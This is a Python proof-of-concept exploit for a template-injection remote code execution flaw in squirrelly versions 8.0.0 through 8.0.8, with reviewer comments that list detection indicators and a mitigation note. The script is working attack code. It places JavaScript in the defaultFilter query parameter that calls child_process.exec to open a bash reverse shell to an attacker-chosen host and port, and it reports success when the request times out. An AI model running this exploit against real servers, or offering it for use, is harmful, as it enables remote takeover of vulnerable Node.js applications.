POC / exploit.py PY
#!/bin/python3
# Source: https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
# Analysis: https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
# squirrelly v8.0.0 through v8.0.8 Remote Code Execution
# Environment : Ubuntu 20.04.1

import requests
from sys import argv

# Proof-of-concept driver for the advisory linked in the file header.
# It reads three positional arguments and issues a single HTTP GET whose only
# query parameter is `defaultFilter`.
#
# Reviewer notes for defenders:
#   * Request-side indicator: a `defaultFilter` query-string parameter whose
#     value contains JavaScript source rather than a plain filter name.
#   * Host-side indicator: the payload text calls `child_process.exec`, so a
#     shell spawned as a child of the Node.js application process is the
#     behaviour to alert on.
#   * Mitigation: NOTE(review): per the linked advisory the root cause is
#     request-controlled data reaching the template engine's options; confirm
#     against the advisory, keep request query objects out of render options,
#     and follow the advisory's guidance on affected versions.
if __name__ == '__main__':
	# No argument-count check: fewer than three arguments raises IndexError.
	url = argv[1]
	lhost = argv[2]
	lport = argv[3]
	# Shell command string; lhost and lport are interpolated without validation.
	command = f'/bin/bash -c "/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"'
	# The parameter value is assembled in three parts: a prefix of quote and
	# bracket characters, a JavaScript statement embedding `command`, and a
	# trailing `//` line-comment marker.
	# NOTE(review): presumably the prefix and suffix exist so the value parses as
	# code inside the compiled template; see the analysis linked in the header.
	code = "e'));"
	code += f"let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('{command}');"
	code += '//'
	# Sent as a query string, so the value appears URL-encoded in access logs.
	payload = {
		'defaultFilter': code
	}
	try:
		# verify = False disables TLS certificate verification for this request;
		# timeout = 1 gives up after one second.
		requests.get(url, params = payload, verify = False, timeout = 1)
	except requests.exceptions.ReadTimeout:
		# Only a read timeout is handled, and it is reported as success. A
		# response within the timeout prints nothing, and other request errors
		# (connection failure, connect timeout) propagate uncaught.
		print('[+] Payload sent. check your listener please')